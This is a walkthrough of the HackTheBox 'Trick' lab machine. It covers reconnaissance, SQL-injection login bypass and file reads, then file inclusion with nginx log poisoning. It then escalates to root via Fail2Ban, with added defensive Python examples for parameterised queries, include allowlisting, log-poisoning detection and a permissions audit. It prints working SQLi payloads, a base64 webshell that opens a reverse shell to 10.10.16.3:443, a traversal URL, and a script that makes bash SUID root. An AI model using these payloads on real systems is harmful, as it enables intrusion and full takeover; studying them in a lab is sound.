Target Information
IP address:
10.129.227.180 (not a fixed IP address)
Information Gathering
ICMP check
PING 10.129.227.180 (10.129.227.180) 56(84) bytes of data.
64 bytes from 10.129.227.180: icmp_seq=1 ttl=63 time=789 ms
64 bytes from 10.129.227.180: icmp_seq=2 ttl=63 time=709 ms
64 bytes from 10.129.227.180: icmp_seq=3 ttl=63 time=425 ms
64 bytes from 10.129.227.180: icmp_seq=4 ttl=63 time=857 ms
--- 10.129.227.180 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 424.988/695.197/857.330/164.606 ms
Network connectivity between the attacking machine and the target is good.
Firewall detection
# Nmap 7.99 scan initiated Tue May 19 09:18:47 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.227.180
Nmap scan report for root.trick.htb (10.129.227.180)
Host is up (0.62s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
53/tcp open|filtered domain
80/tcp open|filtered http
# Nmap done at Tue May 19 09:19:32 2026 -- 1 IP address (1 host up) scanned in 45.79 seconds
The target appears to have four TCP ports open.
Port scanning
TCP port scan results
# Nmap 7.99 scan initiated Tue May 19 23:45:08 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.180.84
Warning: 10.129.180.84 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.180.84
Host is up (1.2s latency).
Not shown: 65052 closed tcp ports (conn-refused), 479 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain (generic dns response: SERVFAIL)
| dns-nsid:
|_ id.server: hkg08
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.99%I=7%D=5/19%Time=6A0CF68D%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 0.05 ms 172.17.0.1
2 216.99 ms 10.10.16.1
3 217.18 ms 10.129.180.84
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 19 23:52:37 2026 -- 1 IP address (1 host up) scanned in 449.28 seconds
UDP port scan results
# Nmap 7.99 scan initiated Tue May 19 23:53:54 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.180.84
Warning: 10.129.180.84 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.180.84
Host is up (0.99s latency).
Not shown: 65279 open|filtered udp ports (no-response), 255 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open domain
# Nmap done at Tue May 19 23:58:07 2026 -- 1 IP address (1 host up) scanned in 253.23 seconds
The scans also show that the target runs Debian Linux and exposes four TCP services: 22/ssh, 25/smtp, 53/dns and 80/http. Following HackTheBox's naming convention, the target's primary domain should be trick.htb.
Service Enumeration
SSH service (port 22)
Try connecting to the target with ssh to check which authentication methods it accepts:
ssh root@trick.htb

The target allows both password and public-key login.
DNS service (port 53)
Use dig to query the main records served by the target's DNS service:
dig any trick.htb @trick.htb

This reveals the subdomain root.trick.htb; next, attempt an AXFR zone transfer:
dig axfr trick.htb @root.trick.htb

Another subdomain is discovered: preprod-payroll.trick.htb!
Web application (port 80)
Main domain and root subdomain
Open the home page: http://trick.htb/

The site's home page is a static page saying the site is under construction. Directory scanning turned up nothing.
Visiting http://root.trick.htb/ shows that this subdomain serves exactly the same content as the main site:

preprod-payroll subdomain
Open the home page: http://preprod-payroll.trick.htb

This subdomain hosts a back-office order management system written in PHP. Start by intercepting with BurpSuite, submit an arbitrary pair of credentials, and analyse the whole login flow:

The front end sends the entered username and password to the back end in plaintext, and when the credentials are wrong the back end returns the number 3. Add a single quote to the username to test for SQL injection:

The back end returns an error saying the SQL result-set object does not exist, which confirms a SQL injection vulnerability here!
Penetration Testing
Login bypass via SQL injection
During service enumeration we found that the login form of the target's web service is vulnerable to SQL injection; now we use it to bypass the login. From the function of the login endpoint it is easy to infer that the back end executes a SQL statement like the following and decides whether the credentials are valid from its result:
SELECT username,password FROM users WHERE username = '<USER>' AND password = '<PASS>';
If we change the username to ' or true -- -, the SQL actually executed by the back end becomes:
SELECT username,password FROM users WHERE username = '' or true -- -' AND password = '<PASS>';
In this case the back-end program will pick up the first record returned by the query. Replay the HTTP request directly with Burp's Repeater:

This time the back end returns the number 1; refresh the browser page:

Login successful!
Finding and exploiting a file inclusion vulnerability
After logging into the back office, browsing through its functions shows that each function page is rendered according to the value of a page parameter:

Try accessing http://preprod-payroll.trick.htb/payroll.php; the file exists:

This strongly suggests a file inclusion vulnerability. Intercept with BurpSuite and use the php://filter wrapper to read the source of payroll.php:
php://filter/read=convert.base64-encode/resource=payroll

File inclusion confirmed! Reading the source of payroll.php shows that the back office also has a payroll_items page that displays order details, to which a numeric id parameter is passed:
$('.view_payroll').click(function(){
    var $id=$(this).attr('data-id');
    location.href = "index.php?page=payroll_items&id="+$id;
});
Reading payroll_items.php further shows that the id parameter is inserted directly into the SQL statement without any filtering or validation, which causes a SQL injection vulnerability:
$pay = $conn->query("SELECT * FROM payroll where id = ".$_GET['id'])->fetch_array();
Click the view button on any record of the Payroll page to reach the Payroll Items function, with BurpSuite interception turned on:

Use the following injection to determine the number of columns actually selected by the SQL statement:
1 order by 1-- -
Increase the ORDER BY argument step by step; when it reaches 8, the page returns blank:

So the query selects 7 columns. Use a UNION SELECT statement to find where the injected data is displayed:
5555 union select 'misaka','misaka','misaka','misaka','misaka','misaka','misaka'-- -

Use the load_file() function to read /etc/passwd, which succeeds:
5555 union select 1,load_file('/etc/passwd'),3,4,5,6,7-- -
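The two injection points found so far, the login form and the numeric id parameter of payroll_items, reproduced as an added example that is not part of this write-up or of the target application. An in-memory SQLite database with constructed sample rows stands in for the real MySQL back end; the vulnerable functions mirror the inferred string-concatenated queries, and each is paired with the parameterised query that rejects the same payloads. Column names other than users, payroll, username, password and id are assumptions, and since SQLite has no load_file(), only the UNION part of the last payload is reproduced.

```python
# Added example, not from the original write-up: the two injection patterns
# (string concatenation in the login query and in the payroll_items id query)
# beside parameterised versions. Uses an in-memory SQLite database with
# constructed sample rows in place of the real MySQL back end.
import sqlite3


def build_db():
    conn = sqlite3.connect(":memory:")
    # Constructed schema: names other than users/payroll/username/password/id
    # are assumptions; payroll gets 7 columns to match the write-up's finding.
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")
    conn.execute(
        "CREATE TABLE payroll (id INTEGER, employee TEXT, amount INTEGER,"
        " c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT)"
    )
    conn.execute("INSERT INTO payroll VALUES (1, 'alice', 100, '', '', '', '')")
    return conn


def login_vulnerable(conn, user, pw):
    # Mirrors the inferred back-end query: input is spliced into SQL text, so a
    # username of  ' or true -- -  turns the WHERE clause into "'' or true" and
    # comments out the password check.
    sql = ("SELECT username,password FROM users WHERE username = '%s'"
           " AND password = '%s'" % (user, pw))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, user, pw):
    # Bound parameters: the same payload is compared as a literal username.
    sql = "SELECT username,password FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (user, pw)).fetchone() is not None


def payroll_item_vulnerable(conn, raw_id):
    # Mirrors payroll_items.php: $_GET['id'] is appended verbatim, so
    # "5555 union select ..." becomes a second SELECT in the same statement.
    return conn.execute("SELECT * FROM payroll where id = " + raw_id).fetchall()


def payroll_item_safe(conn, raw_id):
    # Validate the type first, then bind: non-integer input never becomes SQL.
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute("SELECT * FROM payroll where id = ?", (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable login bypassed:", login_vulnerable(db, "' or true -- -", "x"))
    print("safe login bypassed:      ", login_safe(db, "' or true -- -", "x"))
    union = "5555 union select " + ",".join(["'misaka'"] * 7) + "-- -"
    print("vulnerable id query returns:", payroll_item_vulnerable(db, union))
```

The fix is the same in both places: the query text never changes with the input, and the driver sends the value separately, so neither the quote trick nor the UNION can alter the statement. Type validation on id is a second, independent layer.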

Try reading /etc/nginx/nginx.conf:
......
http {
    ......
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;
    ......
    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/sites-enabled/*;
}
......
From this, the Nginx access log path is /var/log/nginx/access.log and the site configuration directory is /etc/nginx/sites-enabled/. Read the default configuration file in that directory:
server {
    listen 80;
    listen [::]:80;
    server_name preprod-marketing.trick.htb;
    root /var/www/market;
    index index.php;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
    }
}
This reveals the virtual host preprod-marketing.trick.htb, whose document root is /var/www/market/.
Use the file inclusion vulnerability to read /var/www/market/index.php:
php://filter/read=convert.base64-encode/resource=/var/www/market/index

This page only uses include() to include the page specified by the page parameter, and its filter can easily be bypassed by doubling the traversal sequence. Putting all of this together, the plan is to write PHP webshell content into the /var/log/nginx/access.log log file, then visit preprod-marketing.trick.htb and include the access log, thereby executing arbitrary commands.
First send a GET request with BurpSuite, with the webshell content in the User-Agent header:
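Why the doubled sequence works, and what the include should have done instead, as an added example that is neither the target's index.php (whose source is not reproduced here) nor part of this write-up. The filter is assumed to behave like a single-pass, non-recursive removal of "../"; the hardened version does not sanitise at all but validates: it accepts only an allowlisted page name, then resolves the final path and requires it to stay under the document root /var/www/market taken from the nginx config. The page names in the allowlist are assumptions.

```python
# Added example, not from the original write-up: a single-pass "../" filter
# (assumed to match the target's behaviour) and a validate-don't-sanitise
# replacement for choosing which file an index.php?page=... request may include.
import os

PAGES_ROOT = "/var/www/market"        # document root from the nginx vhost above
ALLOWED_PAGES = {"index", "home"}     # assumed page identifiers for the allowlist


def naive_filter(page):
    # Non-recursive removal: "..././" loses only its inner "../" and the
    # characters left on either side join up to form "../" again.
    return page.replace("../", "")


def is_confined(root, page):
    """Containment check alone: does root/page still resolve to a path under root?"""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, page))
    return os.path.commonpath([root, target]) == root


def resolve_include(root, page, allowed=ALLOWED_PAGES):
    """Return the file to include, or None when the request must be rejected."""
    # 1. Allowlist by name: only known page identifiers are accepted, and the
    #    ".php" suffix is appended by the server, never supplied by the client.
    if page not in allowed:
        return None
    # 2. Resolve and confine, so a later mistake in the allowlist still cannot
    #    reach outside the pages directory (symlinks included, via realpath).
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    doubled = "..././..././..././var/log/nginx/access.log"
    print("after naive filter:", naive_filter(doubled))
    print("still confined?   ", is_confined(PAGES_ROOT, naive_filter(doubled)))
    print("allowlist resolves 'home' to:", resolve_include(PAGES_ROOT, "home"))
    print("allowlist on traversal:      ", resolve_include(PAGES_ROOT, doubled))
```

Note that the paths are resolved with realpath without requiring them to exist, which is all the containment check needs; a real handler would additionally check that the resolved file exists and is a regular file.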
<?php system(base64_decode('L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMvNDQzIDA+JjEn')); ?>

Then start a netcat listener on port 443 on the local machine and visit: http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././..././..././var/log/nginx/access.log

Reverse shell obtained!!
Privilege Escalation
Directory enumeration
Once on the target as the michael user, run sudo -l to check the current user's sudo privileges:
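From the defender's side, the log poisoning and the inclusion request both leave artefacts in the same nginx access log. The following added example (not part of this write-up) parses lines in nginx's default combined format and flags three things: a PHP open tag in a logged field, a traversal sequence in the request line (including the doubled "..././" form), and a request that names a log file. The log lines are constructed samples; the IP addresses and timestamps in them are made up.

```python
# Added example, not from the original write-up: detection of log poisoning
# and log-file inclusion attempts over nginx combined-format access log lines.
import re

# nginx default "combined" format: ip - user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)          # PHP open tag in any logged field
TRAVERSAL = re.compile(r"\.\.(/|%2f)", re.IGNORECASE)        # matches "../" inside "..././" too
LOG_INCLUDE = re.compile(r"access\.log|error\.log|/var/log/", re.IGNORECASE)

# Constructed sample lines (addresses and times are made up).
SAMPLE_LOG = [
    '10.10.14.5 - - [19/May/2026:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.16.3 - - [19/May/2026:10:00:07 +0000] "GET / HTTP/1.1" 200 1024 "-" "<?php echo \'poisoned\'; ?>"',
    '10.10.16.3 - - [19/May/2026:10:00:12 +0000] "GET /index.php?page=..././..././..././var/log/nginx/access.log HTTP/1.1" 200 4096 "-" "curl/7.88"',
]


def analyse_line(line):
    """Return (ip, findings) for a parsable line, or None if it is not combined format."""
    m = COMBINED.match(line)
    if not m:
        return None
    findings = []
    # Once a PHP tag is in the log, including the log file executes it, so the
    # write (the poisoning request) is the earliest point to alert on.
    if any(PHP_TAG.search(m[f]) for f in ("ua", "referer", "request")):
        findings.append("php_tag")
    if TRAVERSAL.search(m["request"]):
        findings.append("path_traversal")
    if LOG_INCLUDE.search(m["request"]):
        findings.append("log_file_in_request")
    return m["ip"], findings


def scan(lines):
    """Flagged (ip, findings) pairs, in log order, for every line with at least one finding."""
    results = []
    for line in lines:
        parsed = analyse_line(line)
        if parsed and parsed[1]:
            results.append(parsed)
    return results


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```

Two of the three checks fire on the inclusion request alone, and the poisoning request is caught earlier by the PHP tag check, so the same source address appears twice; correlating both findings per client, rather than alerting on each line, is the natural next step.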

The current user can run the Fail2Ban service management script /etc/init.d/fail2ban as root without a password, but only the restart operation is allowed.
Use find to look for files or directories belonging to the current user's group, security:
find / -group security -exec ls -ld {} \; 2>/dev/null

The Fail2Ban action configuration directory /etc/fail2ban/action.d/ is writable by the current user. After weighing the options, the decision is to create a malicious action configuration file in that directory so that it is executed automatically when the service restarts, thereby achieving privilege escalation.
Privilege escalation via a malicious Fail2Ban configuration
During directory enumeration we established that the Fail2Ban configuration directory /etc/fail2ban/action.d/ on the target is writable, that the current user michael can restart the service via sudo, and decided to escalate privileges by modifying an action configuration file to add a malicious command.
First list the configuration files in that directory:
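The root cause here is a configuration directory that a non-root user can modify combined with a sudo rule that restarts the service which reads it. The following added example (not part of this write-up) is the audit a defender can run for the first half of that condition: it reports every entry under an action.d-style directory, the directory itself included, that is not owned by root or that carries group or world write bits. It builds a constructed look-alike in a temporary directory so it can be run anywhere; the file names in it are only placeholders.

```python
# Added example, not from the original write-up: audit a Fail2Ban action.d
# directory for entries that a non-root principal could modify.
import os
import stat
import tempfile


def writable_by_non_root(path):
    """Reasons a non-root principal could modify `path` (empty list if none)."""
    st = os.stat(path)
    reasons = []
    if st.st_uid != 0:
        reasons.append("owner uid %d is not root" % st.st_uid)
    # Group write is only a problem when the group is not root's own.
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("group-writable by gid %d" % st.st_gid)
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_action_dir(directory):
    """Map each offending path (the directory itself included) to its reasons."""
    entries = [directory] + [os.path.join(directory, n) for n in sorted(os.listdir(directory))]
    findings = {}
    for path in entries:
        reasons = writable_by_non_root(path)
        if reasons:
            findings[path] = reasons
    return findings


def demo_audit():
    """Audit a constructed action.d look-alike; keys are paths relative to it ('.' = the dir)."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o755)
        # Constructed placeholder files with deliberately varied modes.
        specs = {"iptables.conf": 0o644, "nginx-badbots.conf": 0o664, "default.conf": 0o666}
        for name, mode in specs.items():
            p = os.path.join(d, name)
            with open(p, "w") as f:
                f.write("[Definition]\n")   # placeholder content, not a real action
            os.chmod(p, mode)
        findings = audit_action_dir(d)
        return {os.path.relpath(p, d): r for p, r in findings.items()}


if __name__ == "__main__":
    for rel, reasons in demo_audit().items():
        print(rel, "->", "; ".join(reasons))
    # Against the real directory (needs read access): audit_action_dir("/etc/fail2ban/action.d")
```

Run against the real /etc/fail2ban/action.d the audit would have flagged the directory's group write bit for the security group; the second half of the condition, the sudo rule, is visible in sudo -l and should be reviewed whenever a service's configuration tree is not root-only.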
ls -lA /etc/fail2ban/action.d/

There are too many configuration files in the directory and it is not possible to tell which of them are actually active, so the following script was written to inject the malicious command by deleting and recreating each configuration file in the directory in turn, then triggering it via sudo:
#!/usr/bin/python3
import os

action_directory = "/etc/fail2ban/action.d"
# Replacement action config; actionstart runs when the service (re)starts.
evil_config = "[Definition]\nactionstart = /bin/chmod 4755 /bin/bash\n[Init]\nname = default\n"

# Delete and recreate every file in action.d with the replacement config,
# then trigger the sudo-permitted restart.
actionConfigList = os.listdir(action_directory)
for configFile in actionConfigList:
    os.remove("{}/{}".format(action_directory, configFile))
    with open("{}/{}".format(action_directory, configFile), 'w+') as f:
        f.write(evil_config)
os.system("sudo /etc/init.d/fail2ban restart")

SUID bash set successfully! Run the following commands directly to change the root user's password:
/bin/bash -p
python3 -c "import os;os.setuid(0);os.setgid(0);os.system('passwd root')"

Privilege escalation successful!!!!
